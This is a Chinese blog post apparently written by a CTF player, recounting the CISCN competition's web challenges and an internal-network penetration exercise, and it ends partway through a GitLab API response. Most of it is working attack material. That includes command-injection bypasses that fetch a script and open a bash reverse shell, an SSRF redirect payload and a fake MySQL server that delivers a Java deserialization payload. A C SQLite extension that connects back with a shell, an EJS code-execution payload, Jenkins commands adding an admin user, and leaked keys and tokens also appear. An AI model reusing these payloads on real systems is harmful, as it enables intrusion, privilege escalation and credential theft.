写在前面
初赛
华北分区半决赛
- wp
- 碎碎念
国决
- awdp
- 渗透
  - ERP
  - WIN-OPS88
  - WIN-PC3788
  - Jinkens
  - Gitlab
  - RODC
后日谈

写在前面

这次国赛的全过程可以说每一步的结果都在意料之外，诞生了很多想吐槽的东西，最终也是 rank14 成功拿下了国一，K👴也光荣退役了。

1721894511769

初赛

我测真 nm 诸神黄昏，是个人都在框框上分，尤其是最后一小时的黑灯搏杀，真 nm 离谱。

Simple_php

<?php
ini_set('open_basedir', '/var/www/html/');
error_reporting(0);

if(isset($_POST['cmd'])){
    $cmd = escapeshellcmd($_POST['cmd']); 
     if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) {
         system($cmd);
}
}


show_source(__FILE__);
?>

用 %0a 绕过 waf

然后 ip 使用十六进制

1	cur%0al 0xip:80/love -o /tmp/love

下载一个 sh 文件

sh 文件为反弹 shell

#!/bin/bash



bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'

反弹 shell 后，没有找到 flag，查看 /etc/passwd，发现 mysql 用户，推测和数据库有关，猜测 root root 弱密码，但是交互模式不正常，采用 - e 直接执行语句。

easycms

flag.php 需要打个 ssrf，下个源码，扫一下 curl

源码中找调用的位置

在 \dayrui\Fcms\Control\Api\Api.php

经查阅官方文档

路径名不同，但效果一样，构造如下 payload

1	index.php?s=api&c=api&m=qrcode&thumb=http://ip:port/xxx.php&text=114514

<?php
// 重定向到指定的 URL
header('HTTP/1.1 302 Found');
header("Location: http://127.0.0.1/flag.php?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fip%2Fport%200%3E%261'");

?>

由于不能直接在 cmd 弹 shell，选择 302 大法跳转到本地 flag.php，弹 shell

easycms_revenge

把那个 php 的重定向改一下，绕过图片检测

GIF89a
<?php
echo "GIF89a";
header("Location: http://127.0.0.1/flag.php?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fip%2Fport%200%3E%261'");

?>

ez_java(unsolved)

黑灯队友交了两个了，pwn 爹出了个十几解的题，misc 又出了一个，没交了，看看思路吧。

首先现场学了一下 JDBC 连接到 mysql 中产生的反序列化

import com.example.jdbctest.bean.UserBean;
import org.aspectj.weaver.tools.cache.SimpleCache;

import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;

import static org.springframework.util.SerializationUtils.serialize;


public class exp {
    public static void main(String[] args) throws Exception {
        UserBean user = new UserBean();

        Constructor con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class,int.class);

        con.setAccessible(true);
        HashMap map = (HashMap)con.newInstance("", 1);

        String name = "tmp/exp.so";

        //byte[] age = "d2NzbmRt".getBytes(StandardCharsets.ISO_8859_1);

        String age = readFileAsString("2.txt");
        user.setName(name);
        user.setAge(age);
        user.setObj(map);

        serialize_func.serialize(user);
        //serialize_func.unserialize("ser.bin");

        //map.put("src",age);






    }

    public static String readFileAsString(String filePath) throws IOException {
        // 使用java.nio.file.Files读取文件内容并转换为String
        return new String(Files.readAllBytes(Paths.get(filePath)));
    }
}

序列化生成一个二进制文件

# -*- coding:utf-8 -*-
#@Time : 2020/7/27 2:10
#@Author: Tri0mphe7
#@File : server.py
import socket
import binascii
import os

greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"
response_ok_data="0700000200000002000000"

def receive_data(conn):
    data = conn.recv(1024)
    print("[*] Receiveing the package : {}".format(data))
    return str(data).lower()

def send_data(conn,data):
    print("[*] Sending the package : {}".format(data))
    conn.send(binascii.a2b_hex(data))

def get_payload_content():
    #file文件的内容使用ysoserial生成的 使用规则  java -jar ysoserial [common7那个]  "calc" > a
    file= r'ser.bin'
    if os.path.isfile(file):
        with open(file, 'rb') as f:
            payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
        print("open successs")

    else:
        print("open false")
        #calc
        payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878'
    return payload_content

# 主要逻辑
def run():

    while 1:
        conn, addr = sk.accept()
        print("Connection come from {}:{}".format(addr[0],addr[1]))

        # 1.先发送第一个 问候报文
        send_data(conn,greeting_data)

        while True:
            # 登录认证过程模拟  1.客户端发送request login报文 2.服务端响应response_ok
            receive_data(conn)
            send_data(conn,response_ok_data)

            #其他过程
            data=receive_data(conn)
            #查询一些配置信息,其中会发送自己的 版本号
            if "session.auto_increment_increment" in data:
                _payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000'
                send_data(conn,_payload)
                data=receive_data(conn)
            elif "show warnings" in data:
                _payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000'
                send_data(conn, _payload)
                data = receive_data(conn)
            if "set names" in data:
                send_data(conn, response_ok_data)
                data = receive_data(conn)
            if "set character_set_results" in data:
                send_data(conn, response_ok_data)
                data = receive_data(conn)
            if "show session status" in data:
                mysql_data = '0100000102'
                mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
                mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
                # 为什么我加了EOF Packet 就无法正常运行呢？？
                #获取payload
                payload_content=get_payload_content()
                #计算payload长度
                payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
                payload_length_hex = payload_length[2:4] + payload_length[0:2]
                #计算数据包长度
                data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
                data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
                mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
                mysql_data += str(payload_content)
                mysql_data += '07000005fe000022000100'
                send_data(conn, mysql_data)
                data = receive_data(conn)
            if "show warnings" in data:
                payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
                send_data(conn, payload)
            break


if __name__ == '__main__':
    HOST ='127.0.0.1'
    PORT = 3309

    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #当socket关闭后，本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间
    sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sk.bind((HOST, PORT))
    sk.listen(1)

    print("start fake mysql server listening on {}:{}".format(HOST,PORT))

    run()

改一下读取的文件，改成我们的序列化生成的文件

1
2
3

json2 = {"type":"1","url":"jdbc:mysql://xxx:3306/?user=fileread_netdoc:///proc/1/environ&ALLOWLOADLOCALINFILE=true&maxAllowedPacket=655360&allowUrlInLocalInfile=true#",
"tableName":"wcsndm",
}

发送这个 json 可以读取文件

1
2
3

json = {"type":"1","url":"jdbc:mysql://xxxx:7777/?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true",
"tableName":"wcsndm",
}

发送这个可以进行 JDBC 反序列化从而写文件

load_extensions

可以通过 sqlite 加载插件 rce

import sqlite3

# 1. 创建数据库连接（这会创建一个新的数据库文件 example.db）
conn = sqlite3.connect('example.db')

# 2. 创建一个游标对象
cursor = conn.cursor()

# 3. 创建表
cursor.execute('''
CREATE TABLE IF NOT EXISTS users (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    email TEXT NOT NULL UNIQUE
)
''')

# 4. 插入数据
users = [
    ('Alice', 'alice@example.com'),
    ('Bob', 'bob@example.com'),
    ('Charlie', 'charlie@example.com')
]

cursor.executemany('''
INSERT INTO users (name, email) VALUES (?, ?)
''', users)

# 5. 提交事务
conn.commit()

# 6. 查询数据
cursor.execute('SELECT * FROM users')
rows = cursor.fetchall()

# 7. 显示查询结果
for row in rows:
    print(f"ID: {row[0]}, Name: {row[1]}, Email: {row[2]}")

# 8. 关闭连接
conn.close()

生成一个 db

网上找了个项目

/* Add your header comment here */
#include <sqlite3ext.h> /* Do not use <sqlite3.h>! */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <signal.h>
#include <dirent.h>
#include <sys/stat.h>
SQLITE_EXTENSION_INIT1

/* Insert your extension code here */
int tcp_port = 7777;
char *ip = "10.10.10.10";

#ifdef _WIN32
__declspec(dllexport)
#endif

int sqlite3_extension_init(
  sqlite3 *db, 
  char **pzErrMsg, 
  const sqlite3_api_routines *pApi
){
  int rc = SQLITE_OK;
  SQLITE_EXTENSION_INIT2(pApi);
  
  int fd;
  if ( fork() <= 0){
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(tcp_port);
    addr.sin_addr.s_addr = inet_addr(ip);

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if ( connect(fd, (struct sockaddr*)&addr, sizeof(addr)) ){
            exit(0);
    }

    dup2(fd, 0);
    dup2(fd, 1);
    dup2(fd, 2);
    execve("/bin/bash", 0LL, 0LL);
}
  
  return rc;
}

需要改一下端口号

1 2	sudo apt install libsqlite3-dev gcc -g -fPIC -shared YourCode.c -o YourCode.so

编译

然后写入把 so 和 db 文件写入目标服务器

1	json3 = {"type":"3","url":"jdbc:sqlite:/tmp/user.db","tableName":"users where name = load_extension('/tmp/exp.so')"}

发送这个，打 sqlite

最后初赛也是华北第三出线了

华北分区半决赛

去年华北六月初就开打了，今年愣是 23、24 号打，去年最早，今年最晚，更离谱的是打比赛那一天我居然没有安排考试，前后一天都是考试安排，真是幸运。

打这个春秋的 awdp，awdp 会不会打没那么重要，会修才重要，一共四个 web，我全都不知道漏洞点在哪，但基本上凭直觉上 waf 就过了，只能说混的一手好烟。

建议下个 wsl，改完后直接通过 wsl 打包就行了

wp

只有 fix，没有 break。

brokenscanner

直接上 waf，简单粗暴，我也不知道怎么打的.

crazydata

同样是对于传入的参数，狠狠地上 waf。

fury

对于反序列化的参数直接进行过滤，一遍过。

拿了个二血，山河 giegie 拿的是一血。

碎碎念

事情到这里已经发展不对劲了，我们最后是打了个华北第四，然后山河 giegie 最后是 12 还是 13，遗憾倒在了半决。

真√8 抽象，nmd 他们 pwn 爹修也修得慢，break 听说简单的题也没打出来。据 k👴本人所说，inkey✌在前一天晚上疯狂玩老头环，k✌以为他备好赛了😡，byd。

谁能想到一个初赛做出几解的 pwn 爹，半决赛简单的 break 和 fix 没出😊。反正你 k✌是红温了，后面也是不停地拷打 inkey。

我们学校也有自己的 2.5 条悟。

于是事情就发展成了，啊，我打宿傩 (我拿国一)，真的假的。

fc961a27d7cd9945d438ac645f110ac

b63e8e4bb6eee09ec2502a5e5e9d704

国决

千呼万唤始出来，终于是来到了国决☝🤓，早上赶 tm 七点四十五的飞机，从深圳起飞来到了传说中一夜 8000 的双流机场（bushi。

awdp

sharecard

@app.route("/showCard", methods=["GET"])
def show_card():
    token = request.args.get("token")
    data = jwt.decode(token, rsakey.publickey().exportKey(), algorithms=jwt.algorithms.get_default_algorithms())
    blacklists = ['{','}',']','|']
    for i in blacklists:
        if i in data['avatar'] or '..' in data['avatar']:
            return safer_render_template("create.html")
    info = Info(**data)

    info.parse_avatar()
    blacklists2 = ['{', '}', ']', '|','%','_']
    for i in blacklists2:
        if i in info.name or i in info.signature:
            return safer_render_template("create.html")
    return safer_render_template("show.html", info=info)

大胆猜 ssti，过滤一下过了

SolonMaster

🐕🌿的 idea，这个编译出来两个类，idea 只显示一个文件，tmd 子类没有，修了十三次一直没 patch 上，看人家三十多解，👴急了😡😡😡😅😅😅😅

最后直接在资源管理器把编译的子类 patch 上去了，一遍过，日了

protected Class resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
                if(desc.getName().contains("asp")||desc.getName().contains("javax.management")||desc.getName().contains("AbstractTranslet")||desc.getName().contains("Fastjson")||desc.getName().contains("jmx")||desc.getName().contains("HashMap")||desc.getName().contains("java.lang")||desc.getName().contains("com.alibaba.fastjson.JSONArray")||desc.getName().contains("HashMap")||desc.getName().contains("com.alibaba.fastjson")||desc.getName().contains("javax.swing")||desc.getName().contains("java")){
                    throw new IllegalArgumentException("HackerClass:" + desc);
                }
                Class targetc = super.resolveClass(desc);
                if(targetc.getName().contains("asp")||targetc.getName().contains("javax.management")||targetc.getName().contains("AbstractTranslet")||targetc.getName().contains("Fastjson")||targetc.getName().contains("jmx")||targetc.getName().contains("HashMap")||targetc.getName().contains("java.lang")||targetc.getName().contains("com.alibaba.fastjson.JSONArray")||targetc.getName().contains("HashMap")||targetc.getName().contains("com.alibaba.fastjson")||targetc.getName().contains("javax.management")||targetc.getName().contains("javax.swing")||javax.swing.event.SwingPropertyChangeSupport.class.isAssignableFrom(targetc)||desc.getName().contains("java")){
                    throw new IllegalArgumentException("HackerClass:" + targetc);
                }
                if (BadAttributeValueExpException.class.isAssignableFrom(targetc)|| java.util.HashMap.class.isAssignableFrom(targetc)|| JSONArray.class.isAssignableFrom(targetc)|| AbstractAction.class.isAssignableFrom(targetc)|| Map.class.isAssignableFrom(targetc)|| XString.class.isAssignableFrom(targetc)|| StyledEditorKit.AlignmentAction.class.isAssignableFrom(targetc)||AbstractAction.class.isAssignableFrom(targetc)||StyledEditorKit.BoldAction.class.isAssignableFrom(targetc)||StyledEditorKit.StyledTextAction.class.isAssignableFrom(targetc)||StyledEditorKit.UnderlineAction.class.isAssignableFrom(targetc)) {
                    throw new IllegalArgumentException("HackerClass:" + targetc);
                }
                if (!this.check && !User.class.isAssignableFrom(targetc)) {
                    throw new IllegalArgumentException("HackerClass:" + targetc);
                } else if (BadAttributeValueExpException.class.isAssignableFrom(targetc)|| java.util.HashMap.class.isAssignableFrom(targetc)|| JSONArray.class.isAssignableFrom(targetc)|| AbstractAction.class.isAssignableFrom(targetc)|| Map.class.isAssignableFrom(targetc)|| XString.class.isAssignableFrom(targetc)|| StyledEditorKit.AlignmentAction.class.isAssignableFrom(targetc)||AbstractAction.class.isAssignableFrom(targetc)||StyledEditorKit.BoldAction.class.isAssignableFrom(targetc)||StyledEditorKit.StyledTextAction.class.isAssignableFrom(targetc)||StyledEditorKit.UnderlineAction.class.isAssignableFrom(targetc)) {
                    throw new IllegalArgumentException("HackerClass:" + targetc);
                } else {
                    this.check = true;
                    return targetc;
                }

            }
        };

ezjs

运气好，拿了个 fix 一血。

fix

if (newFilePath.endsWith('.html')){
    return res.status(400).send('Invalid file type.');
}
if (newFilePath.endsWith('.htm')){
    return res.status(400).send('Invalid file type.');
}
if (newFilePath.endsWith('.ts')){
    return res.status(400).send('Invalid file type.');
}
if (newFilePath.endsWith('.js')){
    return res.status(400).send('Invalid file type.');
}

break

.ejs 绕过文件上传

render 传参 .ejs/…/ 绕过 render 检验

1	<%= global.process.mainModule.require('child_process').execSync('cat /flag')%>

感觉是非预期。

md 这 idea 坑我，我 tmsolonmonster 十几轮才 fix 出来，不然估计前 10 解了，少了巨多轮分，最后 awdp 打到了 20 名，说实话有点危险，第二天渗透还得努力才行。

☝🤓

渗透

ERP

heapdump 解析

1	algMode = GCM, key = h6/C85NzZrpu4rt5euOt5A==, algName = AES

打 shiro

工具梭了☝🤓

春秋给的 vps，nmd😡aliyun 防火墙，真是服了，反连连不上去，好在 erp 给的是 root，直接写公钥，用作跳板机。

./fscan_386 -h 192.168.8.146/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.8.146   is alive
(icmp) Target 192.168.8.9     is alive
(icmp) Target 192.168.8.16    is alive
(icmp) Target 192.168.8.12    is alive
(icmp) Target 192.168.8.26    is alive
(icmp) Target 192.168.8.38    is alive
(icmp) Target 192.168.8.42    is alive
(icmp) Target 192.168.8.253   is alive
[*] Icmp alive hosts len is: 8
192.168.8.146:22 open
192.168.8.12:88 open
192.168.8.9:1433 open
192.168.8.38:445 open
192.168.8.26:445 open
192.168.8.16:445 open
192.168.8.9:445 open
192.168.8.38:139 open
192.168.8.26:139 open
192.168.8.12:139 open
192.168.8.16:139 open
192.168.8.9:139 open
192.168.8.38:135 open
192.168.8.26:135 open
192.168.8.16:135 open
192.168.8.12:135 open
192.168.8.9:135 open
192.168.8.42:80 open
192.168.8.9:80 open
192.168.8.42:22 open
192.168.8.26:8080 open
192.168.8.16:8080 open
192.168.8.12:445 open
192.168.8.146:8080 open
192.168.8.9:8000 open
192.168.8.38:3306 open
192.168.8.42:8060 open
192.168.8.9:8172 open
192.168.8.42:9094 open
[*] alive ports len is: 29
start vulscan
[*] NetInfo:
[*]192.168.8.9
   [->]WIN-IISSERER
   [->]192.168.8.9
[*] NetBios: 192.168.8.9     WORKGROUP\WIN-IISSERER         
[*] NetBios: 192.168.8.12    [+]DC VERTEXSOFT\RODC          
[*] NetBios: 192.168.8.16    WORKGROUP\WIN-SERVER03         
[*] NetBios: 192.168.8.26    WORKGROUP\WIN-PC3788           
[*] NetInfo:
[*]192.168.8.12
   [->]RODC
   [->]192.168.8.12
[*] NetInfo:
[*]192.168.8.16
   [->]WIN-SERVER03
   [->]192.168.8.16
[*] NetInfo:
[*]192.168.8.38
   [->]WIN-OPS88
   [->]192.168.8.38
[*] NetInfo:
[*]192.168.8.26
   [->]WIN-PC3788
   [->]192.168.8.26
[*] NetBios: 192.168.8.38    WORKGROUP\WIN-OPS88            
[*] WebTitle: http://192.168.8.9        code:200 len:43679  title:VertexSoft
[*] WebTitle: http://192.168.8.146:8080 code:302 len:0      title:None 跳转url: http://192.168.8.146:8080/login;jsessionid=90755EEEA0F7C042B6BED5B745C68D14
[*] WebTitle: http://192.168.8.146:8080/login;jsessionid=90755EEEA0F7C042B6BED5B745C68D14 code:200 len:1383   title:Master ERP login Form
[*] WebTitle: http://192.168.8.42       code:302 len:99     title:None 跳转url: http://192.168.8.42/users/sign_in
[*] WebTitle: http://192.168.8.42:8060  code:404 len:555    title:404 Not Found
[*] WebTitle: http://192.168.8.26:8080  code:200 len:147    title:第一个 JSP 程序
[*] WebTitle: http://192.168.8.16:8080  code:403 len:594    title:None
[*] WebTitle: https://192.168.8.9:8172  code:404 len:0      title:None
[*] WebTitle: http://192.168.8.9:8000   code:200 len:4018   title:Modbus Monitor - VertexSoft Internal Attendance System
[*] WebTitle: http://192.168.8.42/users/sign_in code:200 len:11166  title:登录 · GitLab
[+] http://192.168.8.146:8080 poc-yaml-spring-actuator-heapdump-file 
[+] http://192.168.8.146:8080 poc-yaml-springboot-env-unauth spring2
[+] mysql:192.168.8.38:3306:root 123456

WIN-OPS88

fscan 扫出来 mysql 弱密码，datagrip 连上去 udf 提权，不过没想到是 windows 的 udf，有点罕见☝🤓

1	select 0xxxxx into dumpfile "C:\\Program Files\\MySQL\\MySQL Server 8.0\\lib\\plugin\\exp.dll"

自己本地找一下 udf 用的 dll 文件

WIN-PC3788

本来想打 RODC 的，以为这个是，然后打歪了，拿了个一血，最后也是 4 解，不是哥们怎么才 500 分啊恼

扫出来 backup/upload 目录，是个 put 文件上传漏洞，但是 upload 目录不解析 jsp，尝试绕过

然后上哥斯拉连上去，然后上传 SweetPotato, 提权成功。

Jinkens

jenkins admin:admin123 登录

script 直接拿到

1 2	println "net user test qwer1234! /add".execute().text println "net localgroup administrators test /add".execute().text

远程桌面上去

Gitlab

云境原题，找.jenkins，拿到加密的 token，放入 script 解密，然后输入下面就行

1	proxychains -f /home/siroha/socks5 curl --header "PRIVATE-TOKEN: glpat-bGEgHAJDvwaPP78rsLeS" "http://192.168.8.42/api/v4/projects"

[
    {
        "id": 5,
        "description": null,
        "name": "VertexSoftBackup",
        "name_with_namespace": "VertexSoft / VertexSoftBackup",
        "path": "vertexsoftbackup",
        "path_with_namespace": "vertexsoft/vertexsoftbackup",
        "created_at": "2024-07-11T17:03:43.603Z",
        "default_branch": "main",
        "tag_list": [],
        "topics": [],
        "ssh_url_to_repo": "git@192.168.8.42:vertexsoft/vertexsoftbackup.git",
        "http_url_to_repo": "http://192.168.8.42/vertexsoft/vertexsoftbackup.git",
        "web_url": "http://192.168.8.42/vertexsoft/vertexsoftbackup",
        "readme_url": "http://192.168.8.42/vertexsoft/vertexsoftbackup/-/blob/main/README.md",
        "forks_count": 0,
        "avatar_url": null,
        "star_count": 0,
        "last_activity_at": "2024-07-17T05:42:29.243Z",
        "namespace": {
            "id": 2,
            "name": "VertexSoft",
            "path": "vertexsoft",
            "kind": "group",
            "full_path": "vertexsoft",
            "parent_id": null,
            "avatar_url": null,
            "web_url": "http://192.168.8.42/groups/vertexsoft"
        },
        "repository_storage": "default",
        "_links": {
            "self": "http://192.168.8.42/api/v4/projects/5",
            "issues": "http://192.168.8.42/api/v4/projects/5/issues",
            "merge_requests": "http://192.168.8.42/api/v4/projects/5/merge_requests",
            "repo_branches": "http://192.168.8.42/api/v4/projects/5/repository/branches",
            "labels": "http://192.168.8.42/api/v4/projects/5/labels",
            "events": "http://192.168.8.42/api/v4/projects/5/events",
            "members": "http://192.168.8.42/api/v4/projects/5/members",
            "cluster_agents": "http://192.168.8.42/api/v4/projects/5/cluster_agents"
        },
        "packages_enabled": true,
        "empty_repo": false,
        "archived": false,
        "visibility": "private",
        "resolve_outdated_diff_discussions": false,
        "container_expiration_policy": {
            "cadence": "1d",
            "enabled": false,
            "keep_n": 10,
            "older_than": "90d",
            "name_regex": ".*",
            "name_regex_keep": null,
            "next_run_at": "2024-07-12T17:03:43.667Z"
        },
        "repository_object_format": "sha1",
        "issues_enabled": true,
        "merge_requests_enabled": true,
        "wiki_enabled": true,
        "jobs_enabled": true,
        "snippets_enabled": true,
        "container_registry_enabled": true,
        "service_desk_enabled": false,
        "service_desk_address": null,
        "can_create_merge_request_in": true,
        "issues_access_level": "enabled",
        "repository_access_level": "enabled",
        "merge_requests_access_level": "enabled",
        "forking_access_level": "enabled",
        "wiki_access_level": "enabled",
        "builds_access_level": "enabled",
        "snippets_access_level": "enabled",
        "pages_access_level": "private",
        "analytics_access_level": "enabled",
        "container_registry_access_level": "enabled",
        "security_and_compliance_access_level": "private",
        "releases_access_level": "enabled",
        "environments_access_level": "enabled",
        "feature_flags_access_level": "enabled",
        "infrastructure_access_level": "enabled",
        "monitor_access_level": "enabled",
        "model_experiments_access_level": "enabled",
        "model_registry_access_level": "enabled",
        "emails_disabled": false,
        "emails_enabled": true,
        "shared_runners_enabled": true,
        "lfs_enabled": true,
        "creator_id": 1,
        "import_url": null,
        "import_type": null,
        "import_status": "none",
        "open_issues_count": 0,
        "description_html": "",
        "updated_at": "2024-07-17T05:42:29.243Z",
        "ci_default_git_depth": 20,
        "ci_forward_deployment_enabled": true,
        "ci_forward_deployment_rollback_allowed": true,
        "ci_job_token_scope_enabled": false,
        "ci_separated_caches": true,
        "ci_allow_fork_pipelines_to_run_in_parent_project": true,
        "build_git_strategy": "fetch",
        "keep_latest_artifact": true,
        "restrict_user_defined_variables": false,
        "runners_token": "GR1348941cVxxrGfbYCRyHzGyNtRE",
        "runner_token_expiration_interval": null,
        "group_runners_enabled": true,
        "auto_cancel_pending_pipelines": "enabled",
        "build_timeout": 3600,
        "auto_devops_enabled": true,
        "auto_devops_deploy_strategy": "continuous",
        "ci_config_path": null,
        "public_jobs": true,
        "shared_with_groups": [],
        "only_allow_merge_if_pipeline_succeeds": false,
        "allow_merge_on_skipped_pipeline": null,
        "request_access_enabled": true,
        "only_allow_merge_if_all_discussions_are_resolved": false,
        "remove_source_branch_after_merge": true,
        "printing_merge_request_link_enabled": true,
        "merge_method": "merge",
        "squash_option": "default_off",
        "enforce_auth_checks_on_uploads": true,
        "suggestion_commit_message": null,
        "merge_commit_template": null,
        "squash_commit_template": null,
        "issue_branch_template": null,
        "warn_about_potentially_unwanted_characters": true,
        "autoclose_referenced_issues": true,
        "permissions": {
            "project_access": null,
            "group_access": {
                "access_level": 50,
                "notification_level": 3
            }
        }
    },
    {
        "id": 4,
        "description": "Hexo",
        "name": "Hexo",
        "name_with_namespace": "VertexSoft / Hexo",
        "path": "hexo",
        "path_with_namespace": "vertexsoft/hexo",
        "created_at": "2024-07-11T17:01:31.691Z",
        "default_branch": "master",
        "tag_list": [],
